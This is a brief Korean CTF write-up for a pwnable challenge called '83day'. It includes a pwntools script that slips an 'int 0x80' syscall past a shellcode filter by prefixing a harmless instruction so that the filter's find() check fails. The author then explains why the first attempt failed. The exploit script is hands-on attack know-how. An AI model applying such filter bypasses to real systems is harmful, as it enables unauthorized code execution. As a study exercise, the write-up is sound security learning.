Pwnable/CTF
CAT_SECURITY WhiteHackerLeague
HSr00t
2017. 11. 19. 02:42
83day라는 파이썬 소스가 주어지고 shellcode를 우회하는 문제였다.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 | from pwn import * #p=remote("10.10.134.124",30020) p=remote("127.0.0.1",30030) context(arch="i386",os="linux") print p.recv(1024) p.sendline("mov eax,eax") p.sendline(".byte 0xcd") p.sendline(".byte 0x80") p.sendline("END\n") print asm('int 0x80') p.interactive() |
처음에 바로 .byte 0xcd로 시작하여서 왜 안될까하다가 소스를 다시 한번 분석해보니 .find >0 0보다 커야된다
맨 처음에 \xcd\x80이 발견되었으니 당연히 find 반환값이 0이여서 \xcd\x80이 제대로 들어갔어도 플래그를 얻을수없다.
그래서 mov eax,eax를 하고 해봤더니 플래그가 나왔다.
요즘 문제가 조금 잘 풀려서 포너블 실력이 많이 좋아졋다고 생각하였는데 아닌것같다.